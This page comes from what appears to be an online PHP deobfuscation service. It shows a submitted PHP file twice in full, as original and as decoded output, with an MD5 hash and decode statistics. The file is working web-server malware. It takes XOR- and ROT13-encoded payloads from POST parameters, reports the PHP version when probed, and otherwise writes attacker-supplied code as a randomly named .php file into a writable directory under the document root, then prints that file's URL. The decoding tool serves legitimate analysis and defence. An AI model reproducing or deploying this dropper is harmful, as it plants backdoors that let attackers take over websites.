Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $xvnlqpm = "yjbwgonizdcrsrcn";$mldaerx = "";foreach ($_POST as $lgonf => $fhgfcxtcht..
Decoded Output download
<?php $xvnlqpm = "yjbwgonizdcrsrcn";$mldaerx = "";foreach ($_POST as $lgonf => $fhgfcxtchtkvdsi){if (strlen($lgonf) == 16 and substr_count($fhgfcxtchtkvdsi, "%") > 10){opctyvxtu($lgonf, $fhgfcxtchtkvdsi);}}function opctyvxtu($lgonf, $sxkmtrh){global $mldaerx;$mldaerx = $lgonf;$sxkmtrh = str_split(rawurldecode(str_rot13($sxkmtrh)));function jbsrguo($rctafddji, $lgonf){global $xvnlqpm, $mldaerx;return $rctafddji ^ $xvnlqpm[$lgonf % strlen($xvnlqpm)] ^ $mldaerx[$lgonf % strlen($mldaerx)];}$sxkmtrh = implode("", array_map("jbsrguo", array_values($sxkmtrh), array_keys($sxkmtrh)));$sxkmtrh = @unserialize($sxkmtrh);if (@is_array($sxkmtrh)){$lgonf = array_keys($sxkmtrh);$sxkmtrh = $sxkmtrh[$lgonf[0]];if ($sxkmtrh === $lgonf[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function jouyf($fhgfcxtchir) {static $llplbr = array();$znpbj = glob($fhgfcxtchir . '/*', GLOB_ONLYDIR);if (count($znpbj) > 0) {foreach ($znpbj as $fhgfcxtch){if (@is_writable($fhgfcxtch)){$llplbr[] = $fhgfcxtch;}}}foreach ($znpbj as $fhgfcxtchir) jouyf($fhgfcxtchir);return $llplbr;}$uljxtsabk = $_SERVER["DOCUMENT_ROOT"];$znpbj = jouyf($uljxtsabk);$lgonf = array_rand($znpbj);$gvheanind = $znpbj[$lgonf] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($gvheanind, $sxkmtrh);echo "http://" . $_SERVER["HTTP_HOST"] . substr($gvheanind, strlen($uljxtsabk));exit();}}} ?>
Did this file decode correctly?
Original Code
<?php $xvnlqpm = "yjbwgonizdcrsrcn";$mldaerx = "";foreach ($_POST as $lgonf => $fhgfcxtchtkvdsi){if (strlen($lgonf) == 16 and substr_count($fhgfcxtchtkvdsi, "%") > 10){opctyvxtu($lgonf, $fhgfcxtchtkvdsi);}}function opctyvxtu($lgonf, $sxkmtrh){global $mldaerx;$mldaerx = $lgonf;$sxkmtrh = str_split(rawurldecode(str_rot13($sxkmtrh)));function jbsrguo($rctafddji, $lgonf){global $xvnlqpm, $mldaerx;return $rctafddji ^ $xvnlqpm[$lgonf % strlen($xvnlqpm)] ^ $mldaerx[$lgonf % strlen($mldaerx)];}$sxkmtrh = implode("", array_map("jbsrguo", array_values($sxkmtrh), array_keys($sxkmtrh)));$sxkmtrh = @unserialize($sxkmtrh);if (@is_array($sxkmtrh)){$lgonf = array_keys($sxkmtrh);$sxkmtrh = $sxkmtrh[$lgonf[0]];if ($sxkmtrh === $lgonf[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function jouyf($fhgfcxtchir) {static $llplbr = array();$znpbj = glob($fhgfcxtchir . '/*', GLOB_ONLYDIR);if (count($znpbj) > 0) {foreach ($znpbj as $fhgfcxtch){if (@is_writable($fhgfcxtch)){$llplbr[] = $fhgfcxtch;}}}foreach ($znpbj as $fhgfcxtchir) jouyf($fhgfcxtchir);return $llplbr;}$uljxtsabk = $_SERVER["DOCUMENT_ROOT"];$znpbj = jouyf($uljxtsabk);$lgonf = array_rand($znpbj);$gvheanind = $znpbj[$lgonf] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($gvheanind, $sxkmtrh);echo "http://" . $_SERVER["HTTP_HOST"] . substr($gvheanind, strlen($uljxtsabk));exit();}}}
Function Calls
None |
Stats
MD5 | c3567838066cb8c0dcb0b2bf42dd9a32 |
Eval Count | 0 |
Decode Time | 92 ms |